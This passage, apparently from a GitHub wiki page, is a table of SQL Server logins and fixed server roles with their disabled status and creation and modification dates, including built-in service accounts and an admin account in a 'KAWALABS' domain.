| NT SERVICE\SQLTELEMETRY   | WINDOWS_LOGIN | False       | 5/29/2024 11:43:40 AM | 5/29/2024 11:43:40 AM |
| NT SERVICE\SQLSERVERAGENT | WINDOWS_LOGIN | False       | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:39 AM |
| NT Service\MSSQLSERVER    | WINDOWS_LOGIN | False       | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:39 AM |
| NT AUTHORITY\SYSTEM       | WINDOWS_LOGIN | False       | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:39 AM |
| NT SERVICE\Winmgmt        | WINDOWS_LOGIN | False       | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:39 AM |
| NT SERVICE\SQLWriter      | WINDOWS_LOGIN | False       | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:39 AM |
| KAWALABS\admin            | WINDOWS_LOGIN | False       | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:39 AM |
| public                    | SERVER_ROLE   | False       | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| sysadmin                  | SERVER_ROLE   | False       | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| securityadmin             | SERVER_ROLE   | False       | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| serveradmin               | SERVER_ROLE   | False       | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| setupadmin                | SERVER_ROLE   | False       | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| processadmin              | SERVER_ROLE   | False       | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| diskadmin                 | SERVER_ROLE   | False       | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| dbcreator                 | SERVER_ROLE   | False       | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| bulkadmin                 | SERVER_ROLE   | False       | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
Clone this wiki locally